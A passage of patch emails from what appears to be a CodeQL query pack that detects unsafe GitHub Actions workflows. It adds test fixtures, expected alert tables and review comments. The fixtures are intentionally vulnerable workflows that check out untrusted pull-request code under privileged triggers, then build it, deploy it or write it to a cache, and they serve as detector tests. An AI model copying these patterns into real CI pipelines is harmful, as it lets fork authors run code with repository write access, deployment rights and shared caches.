+| .github/workflows/issue_comment_octokit.yml:19:9:26:6 | Uses Step: fetch_pr | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:26:9:30:6 | Uses Step | .github/workflows/issue_comment_octokit.yml:30:9:35:2 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha |
+| .github/workflows/issue_comment_octokit.yml:38:9:52:6 | Uses Step: get-pr-info | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:52:9:57:6 | Run Step: get-sha | .github/workflows/issue_comment_octokit.yml:57:9:62:2 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:66:9:79:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:79:9:83:2 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:87:9:95:6 | Uses Step: sha | .github/workflows/issue_comment_octokit.yml:95:9:100:2 | Uses Step |
+| .github/workflows/issue_comment_octokit.yml:103:9:109:6 | Uses Step: request | .github/workflows/issue_comment_octokit.yml:109:9:114:66 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step |
+| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | 
.github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:11:7:15:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step |
+| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:15:7:16:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:16:7:20:4 | Run Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step |
+| .github/workflows/label_trusted_checkout.yml:20:7:24:4 | Uses Step | .github/workflows/label_trusted_checkout.yml:24:7:27:21 | Uses Step |
+| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:36:9:39:6 | Uses Step |
+| .github/workflows/level0.yml:33:9:36:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities |
+| .github/workflows/level0.yml:36:9:39:6 | Uses Step | .github/workflows/level0.yml:39:9:52:2 | Run Step: check_profanities |
+| .github/workflows/level0.yml:62:9:65:6 | Uses Step | .github/workflows/level0.yml:65:9:86:2 | Uses Step |
+| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step |
+| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step |
+| .github/workflows/level0.yml:96:9:99:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step |
+| .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:103:9:107:6 | Uses Step |
+| 
.github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:103:9:107:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:122:9:125:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:129:9:133:6 | Uses Step | +| .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/level0.yml:129:9:133:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:22:9:29:6 | Uses Step | +| .github/workflows/mend.yml:13:9:22:6 | Run Step: set_ref | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | +| .github/workflows/priv_pull_request_checkout.yml:14:9:20:6 | Uses Step | .github/workflows/priv_pull_request_checkout.yml:20:9:23:52 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:21:9:24:6 | Run Step | +| .github/workflows/test1.yml:18:9:21:6 | Uses Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test1.yml:21:9:24:6 | Run Step | .github/workflows/test1.yml:24:9:25:39 | Run Step | +| .github/workflows/test2.yml:13:9:16:6 | Uses Step | .github/workflows/test2.yml:16:9:20:52 | Uses Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | .github/workflows/test3.yml:33:9:35:6 | Run Step | +| .github/workflows/test3.yml:28:9:33:6 | Uses Step | 
.github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test3.yml:33:9:35:6 | Run Step | .github/workflows/test3.yml:35:9:41:63 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:25:7:31:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:18:7:25:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:31:7:33:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:25:7:31:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:33:7:38:4 | Uses Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| 
.github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:31:7:33:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:38:7:40:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:33:7:38:4 | Uses Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:40:7:41:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:38:7:40:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:41:7:42:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:40:7:41:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:42:7:43:4 | Run Step | +| .github/workflows/test4.yml:41:7:42:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 | Uses Step | +| .github/workflows/test4.yml:42:7:43:4 | Run Step | .github/workflows/test4.yml:43:7:46:39 
| Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | +| .github/workflows/unpinned_tags.yml:9:7:10:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/unpinned_tags.yml:10:7:11:4 | Uses Step | .github/workflows/unpinned_tags.yml:11:7:11:61 | Uses Step | +| .github/workflows/untrusted_checkout2.yml:7:9:14:6 | Run Step: pr_number | .github/workflows/untrusted_checkout2.yml:14:9:19:72 | Run Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | +| .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/untrusted_checkout.yml:16:9:20:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | +| .github/workflows/workflow_run_untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/workflow_run_untrusted_checkout.yml:16:9:18:31 | Uses Step | +#select +| .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | .github/workflows/auto_ci.yml:20:9:27:6 | Uses Step | .github/workflows/auto_ci.yml:32:9:37:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:79:9:84:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. 
| +| .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | .github/workflows/auto_ci.yml:67:9:74:6 | Uses Step | .github/workflows/auto_ci.yml:84:9:93:6 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | .github/workflows/gitcheckout.yml:10:11:18:8 | Run Step | .github/workflows/gitcheckout.yml:21:11:23:22 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:107:9:112:2 | Run Step | .github/workflows/level0.yml:99:9:103:6 | Uses Step | .github/workflows/level0.yml:107:9:112:2 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/level0.yml:133:9:135:23 | Run Step | .github/workflows/level0.yml:125:9:129:6 | Uses Step | .github/workflows/level0.yml:133:9:135:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/mend.yml:29:9:33:28 | Uses Step | .github/workflows/mend.yml:22:9:29:6 | Uses Step | .github/workflows/mend.yml:29:9:33:28 | Uses Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:10:9:13:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | +| .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | .github/workflows/untrusted_checkout.yml:13:9:16:6 | Uses Step | .github/workflows/untrusted_checkout.yml:20:9:22:23 | Run Step | Potential unsafe checkout of untrusted code on a privileged workflow. | From 878317ab6b28ecbdf2838a5ea393e223745a5db1 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:18:10 +0200 Subject: [PATCH 351/707] Bump qlpack versions
---
 ql/lib/qlpack.yml | 2 +- ql/src/qlpack.yml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/ql/lib/qlpack.yml b/ql/lib/qlpack.yml
index 761554c60e6d..847a7b83e541 100644
--- a/ql/lib/qlpack.yml
+++ b/ql/lib/qlpack.yml
@@ -2,7 +2,7 @@
 library: true
 warnOnImplicitThis: true
 name: github/actions-all
-version: 0.1.4
+version: 0.1.5
 dependencies:
 codeql/util: ^1.0.0
 codeql/yaml: ^1.0.0
diff --git a/ql/src/qlpack.yml b/ql/src/qlpack.yml
index 9ccc911594f5..be2b4e428c98 100644
--- a/ql/src/qlpack.yml
+++ b/ql/src/qlpack.yml
@@ -1,7 +1,7 @@
 ---
 library: false
 name: github/actions-queries
-version: 0.1.4
+version: 0.1.5
 groups: [actions, queries]
 suites: codeql-suites
 extractor: javascript
From 76b115deb09da540e370ebdbf557d19a84dc41fb Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Wed, 26 Jun 2024 19:44:44 +0200 Subject: [PATCH 352/707] Dedup Cache poisoning and Untrusted checkout --- ql/src/Security/CWE-349/CachePoisoning.ql | 3 +- .../CWE-349/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-349/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-349/.github/workflows/poc3.yml | 64 +++++++++++++++++++ .../Security/CWE-349/CachePoisoning.expected | 57 +++++++++++++++++ .../CWE-829/.github/workflows/poc.yml | 63 ++++++++++++++++++ .../CWE-829/.github/workflows/poc2.yml | 58 +++++++++++++++++ .../CWE-829/.github/workflows/poc3.yml | 64 +++++++++++++++++++ .../CWE-829/.github/workflows/test.yml | 37 +++++++++++ .../UntrustedCheckoutCritical.expected | 60 +++++++++++++++++ .../CWE-829/UntrustedCheckoutMedium.expected | 2 + 11 files changed, 528 insertions(+), 1 deletion(-) create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc2.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/poc3.yml create mode 100644 ql/test/query-tests/Security/CWE-829/.github/workflows/test.yml diff --git a/ql/src/Security/CWE-349/CachePoisoning.ql b/ql/src/Security/CWE-349/CachePoisoning.ql index 2a9952ce07f5..f202b1fcecf7 100644 --- a/ql/src/Security/CWE-349/CachePoisoning.ql +++ b/ql/src/Security/CWE-349/CachePoisoning.ql 
@@ -41,7 +41,8 @@ where
 // the job writes to the cache
 // (No need to follow the checkout step as the cache writing is normally done after the job completes)
 j.getAStep() = s and
- s instanceof CacheWritingStep
+ s instanceof CacheWritingStep and
+ not s instanceof PoisonableStep
 or
 // the job executes checked-out code
 // (The cache specific token can be leaked even for non-privileged workflows)
diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml
new file mode 100644
index 000000000000..6900c3bc23fa
--- /dev/null
+++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc.yml
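Review bot: The new `not s instanceof PoisonableStep` conjunct carries no comment explaining why a cache-writing step is dropped from this branch when it also executes checked-out code; the commit title ("Dedup") is the only hint. A step that is both a `CacheWritingStep` and a `PoisonableStep` now has to be reported by the second disjunct (`// the job executes checked-out code`, whose body continues outside the hunk) or by the untrusted-checkout queries, so the code should say which, e.g. `// Steps that execute checked-out code are reported as PoisonableStep below (and by UntrustedCheckout*); keep only pure cache writers here to avoid duplicate alerts`. The updated CachePoisoning.expected still lists `setup-node` with `cache: npm` (poc3.yml:33) next to the `npm` run steps, which suggests the exclusion is narrow, but no fixture in this commit contains a step matching both classes, so the dedup itself is untested; a fixture step that writes the cache and runs repo code (hedged: e.g. a `run:` that invokes `actions/cache`-style tooling) would pin it.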
@@ -0,0 +1,63 @@ +# This workflow uses actions that are not certified by GitHub. +# They are provided by a third-party and are governed by +# separate terms of service, privacy policy, and support +# documentation. + +# Sample workflow for building and deploying a Jekyll site to GitHub Pages +name: Deploy Jekyll site to Pages preview environment +on: + # Runs on pull requests targeting the default branch + pull_request_target: + branches: ["main"] +# Sets permissions of the GITHUB_TOKEN to allow deployment to GitHub Pages +permissions: + contents: read + pages: write + id-token: write +# Allow only one concurrent deployment per PR, skipping runs queued between the run in-progress and latest queued. +# However, do NOT cancel in-progress runs as we want to allow these production deployments to complete. +concurrency: + group: 'pages-preview @ ${{ github.event.pull_request.head.label || github.head_ref || github.ref }}' + cancel-in-progress: false +jobs: + # Build job + build: + # Limit permissions of the GITHUB_TOKEN for untrusted code + permissions: + contents: read + runs-on: ubuntu-latest + steps: + - name: Checkout + uses: actions/checkout@692973e3d937129bcbf40652eb9f2f61becf3332 # v4 + with: + # For PRs make sure to checkout the PR branch + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + - name: Setup Pages + uses: actions/configure-pages@983d7736d9b0ae728b81ab479565c72886d7745b # v5 + - name: Build with Jekyll + uses: actions/jekyll-build-pages@b178f9334b208360999a0a57b523613563698c66 # v1 + with: + source: ./ + destination: ./_site + - name: Upload artifact + # Automatically uploads an artifact from the './_site' directory by default + uses: actions/upload-pages-artifact@56afc609e74202658d3ffba0e8f6dda462b719fa # v3 + # Deployment job + deploy: + environment: + name: 'Pages Preview' + url: ${{ steps.deployment.outputs.page_url }} + # Sets permissions of the GITHUB_TOKEN to allow deployment to 
GitHub Pages + permissions: + contents: read + pages: write + id-token: write + runs-on: ubuntu-latest + needs: build + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@d6db90164ac5ed86f2b6aed7e0febac5b3c0c03e # v4 + with: + preview: 'true' diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml new file mode 100644 index 000000000000..5501beb9ea2f --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc2.yml 
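Review bot: The fixture has no comment stating what it is meant to exercise: under `pull_request_target` the `build` job checks out `github.event.pull_request.head.ref` from `github.event.pull_request.head.repo.full_name` and then runs `actions/jekyll-build-pages` on that tree, while the `deploy` job (`pages: write`, `id-token: write`, `needs: build`) presumably publishes whatever that build produced. CachePoisoning.expected records the alert on the `Build with Jekyll` step (checkout at 30:9 → step at 38:9), so a header such as `# Positive: pull_request_target + fork checkout + build run on the checked-out tree; expect an alert on the jekyll-build-pages step` would keep the fixture and the .expected rows in sync. The `# Limit permissions of the GITHUB_TOKEN for untrusted code` comment documents the upstream template's mitigation but, read cold, reads like a claim the workflow is safe; the fixture should say that the reduced token does not change that the deployed artifact comes from untrusted code.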
@@ -0,0 +1,58 @@ +name: branch-deploy + +on: + issue_comment: + types: [created] + +# Permissions needed for reacting and adding comments for IssueOps commands +permissions: + pull-requests: write + deployments: write + contents: write + checks: read + +jobs: + branch-deploy: + name: branch-deploy + if: # only run on pull request comments and very specific comment body string as defined in our branch-deploy settings + ${{ github.event.issue.pull_request && + (startsWith(github.event.comment.body, '.deploy') || + startsWith(github.event.comment.body, '.noop') || + startsWith(github.event.comment.body, '.lock') || + startsWith(github.event.comment.body, '.help') || + startsWith(github.event.comment.body, '.wcid') || + startsWith(github.event.comment.body, '.unlock')) }} + runs-on: ubuntu-latest + + steps: + - name: branch-deploy + id: branch-deploy + uses: github/branch-deploy@v9 + with: + trigger: ".deploy" + environment: "production" + sticky_locks: "true" # https://github.com/github/branch-deploy/blob/1f6516ef5092890ce75d9e97ca7cbdb628e38bdd/docs/hubot-style-deployment-locks.md + + # Check out the ref from the output of the IssueOps command + - uses: actions/checkout@v4 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + ref: ${{ steps.branch-deploy.outputs.ref }} + + - uses: ruby/setup-ruby@d4526a55538b775af234ba4af27118ed6f8f6677 # pin@v1.172.0 + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + with: + bundler-cache: true + + - name: bootstrap + if: ${{ steps.branch-deploy.outputs.continue == 'true' }} + run: script/bootstrap + + # Here we run a deploy. 
It is "gated" by the IssueOps logic and will only run if the outputs from our branch-deploy step indicate that the workflow should continue + - name: deploy + if: ${{ steps.branch-deploy.outputs.continue == 'true' && steps.branch-deploy.outputs.noop != 'true' }} + run: | + set -o pipefail + script/deploy | tee deploy.out + bundle exec ruby script/ci/render_deploy_message.rb + rm deploy.out diff --git a/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml new file mode 100644 index 000000000000..4d5ae1f528cd --- /dev/null +++ b/ql/test/query-tests/Security/CWE-349/.github/workflows/poc3.yml 
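Review bot: Nothing in the fixture says whether it is a positive or negative case: it checks out `steps.branch-deploy.outputs.ref` on an `issue_comment` trigger with `contents: write` and `deployments: write` and then runs `script/bootstrap` and `script/deploy` from that tree, yet CachePoisoning.expected gains only `edges` rows for poc2.yml and no `#select` row. If `ruby/setup-ruby` with `bundler-cache: true` is intended to be modeled as a cache-writing step this looks like a gap; if the indirect ref (an action output rather than the event payload) or the trigger is the reason, a header comment should say so, e.g. `# Negative for CachePoisoning: ref comes from the branch-deploy output, not directly from the event`. Separately, `github/branch-deploy@v9` is a mutable tag while `ruby/setup-ruby` is SHA-pinned; fine for a fixture if deliberate, but worth a one-line note so the repo's unpinned-tag expectations (an `unpinned_tags.yml` fixture exists elsewhere in this test tree) stay explicit.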
@@ -0,0 +1,64 @@ +name: Publish + +on: + push: + branches: + - main + pull_request_target: + workflow_dispatch: + workflow_call: + +jobs: + build-and-upload: + runs-on: ubuntu-latest + permissions: + contents: read + steps: + + - name: Checkout PR + if: ${{ github.event_name == 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: ${{ github.event.pull_request.head.ref }} + repository: ${{ github.event.pull_request.head.repo.full_name }} + + - name: Checkout + if: ${{ github.event_name != 'pull_request_target' }} + uses: actions/checkout@v3 + with: + ref: main + + - name: Setup Pages + uses: actions/configure-pages@v1 + - name: Use Node.js + uses: actions/setup-node@v3 + with: + node-version: 18 + cache: npm + - name: Update npm to latest + run: npm i --prefer-online --no-fund --no-audit -g npm@latest + - run: npm -v + - run: npm i --ignore-scripts --no-audit --no-fund --package-lock + - run: npm run build -w www + - name: Upload artifact + uses: actions/upload-pages-artifact@v1 + with: + path: './workspaces/www/build' + + deploy: + runs-on: ubuntu-latest + needs: build-and-upload + environment: + name: github-pages + url: ${{ steps.deployment.outputs.page_url }} + permissions: + pages: write + id-token: write + outputs: + deployment_url: ${{ steps.deployment.outputs.page_url }} + steps: + - name: Deploy to GitHub Pages + id: deployment + uses: actions/deploy-pages@v1 + with: + preview: ${{ github.event_name == 'pull_request_target' }} diff --git a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected index 6a91d49c0ca0..2580531afd3b 100644 --- a/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected +++ b/ql/test/query-tests/Security/CWE-349/CachePoisoning.expected 
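Review bot: This is the positive case for the dedup (the new `#select` rows in CachePoisoning.expected cover `setup-node` with `cache: npm` at 33:7 and the `npm` run steps at 38, 41 and 42, but not `npm -v` at 40), yet the file carries no comment saying so, and the trigger mix is what makes it interesting: `push` to `main` and `pull_request_target` share one job, so a cache entry written while building a fork's `head.ref` lands in the default-branch cache scope. A header such as `# Positive: pull_request_target checkout of fork head + setup-node cache + npm scripts; expect alerts on the cache step and on each step that runs checked-out code` would tie the fixture to the expected rows. Note that `npm i --ignore-scripts` at line 41 is still flagged; if that is intended (package.json and the lockfile still come from the PR) say so in a comment, otherwise it may mean the PoisonableStep model does not look at `--ignore-scripts`.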
@@ -1,4 +1,56 @@ edges +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:37:9:42:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:28:9:37:6 | Uses Step: branch-deploy | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:42:9:47:6 | Uses Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:37:9:42:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:47:9:52:6 | Run Step | +| .github/workflows/poc2.yml:42:9:47:6 | Uses Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc2.yml:47:9:52:6 | Run Step | .github/workflows/poc2.yml:52:9:58:24 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:25:7:31:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:18:7:25:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| 
.github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:31:7:33:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:25:7:31:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:33:7:38:4 | Uses Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:40:7:41:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:41:7:42:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:42:7:43:4 | Run Step | +| .github/workflows/poc3.yml:31:7:33:4 | Uses Step | .github/workflows/poc3.yml:43:7:48:2 | Uses Step | +| .github/workflows/poc3.yml:33:7:38:4 | Uses Step | .github/workflows/poc3.yml:38:7:40:4 | Run Step | +| 